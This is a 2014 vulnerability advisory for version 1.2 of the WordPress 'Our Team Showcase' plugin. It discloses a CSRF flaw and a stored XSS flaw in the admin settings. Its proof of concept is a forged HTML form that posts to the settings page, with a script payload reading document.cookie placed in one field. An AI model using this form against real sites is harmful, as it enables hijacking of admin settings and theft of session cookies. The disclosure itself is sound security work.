WordPress Our Team Showcase 1.2 CSRF / XSS

`Title: WordPress 'Our Team Showcase' plugin - CSRF/XSS  
Version: 1.2  
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej  
Date: 2014/12/12  
Download: https://wordpress.org/plugins/our-team-enhanced/  
Notified WordPress: 2014/11/27  
----------------------------------------------------------------  
  
## Description:   
----------------------------------------------------------------  
This plugin allows you to add, edit, search and display your team members on any page, or in a widget quickly and easily.  
It comes with a couple of different styles to choose from.  
Re-order team members with a simple drag & drop.  
output your team members anywhere with the shortcode [our-team]  
Boosts SEO with schema.org markup  
  
## CSRF:  
----------------------------------------------------------------  
It is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page.   
  
  
## Stored XSS:  
----------------------------------------------------------------  
Some settings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields.   
  
PoC:  
Log in as admin and then submit the following form.   
<form method="POST" action="http://[DOMAIN]wp-admin/edit.php?post_type=team_member&page=sc_team_settings" enctype="multipart/form-data">   
<input type="text" name="sc_our_team_template" value="grid"><br />  
<input type="text" name="sc_our_team_social" value="yes"><br />  
<text>sc_our_team_member_count: </text>  
<input type="text" name="sc_our_team_member_count" value="-1"><script>alert(document.cookie);</script>"><br />  
<input type="text" name="sc_our_team_save" value="Update"><br />   
<input type="submit">  
</form>  
  
  
## Solution  
----------------------------------------------------------------  
Update to version 1.3.  
`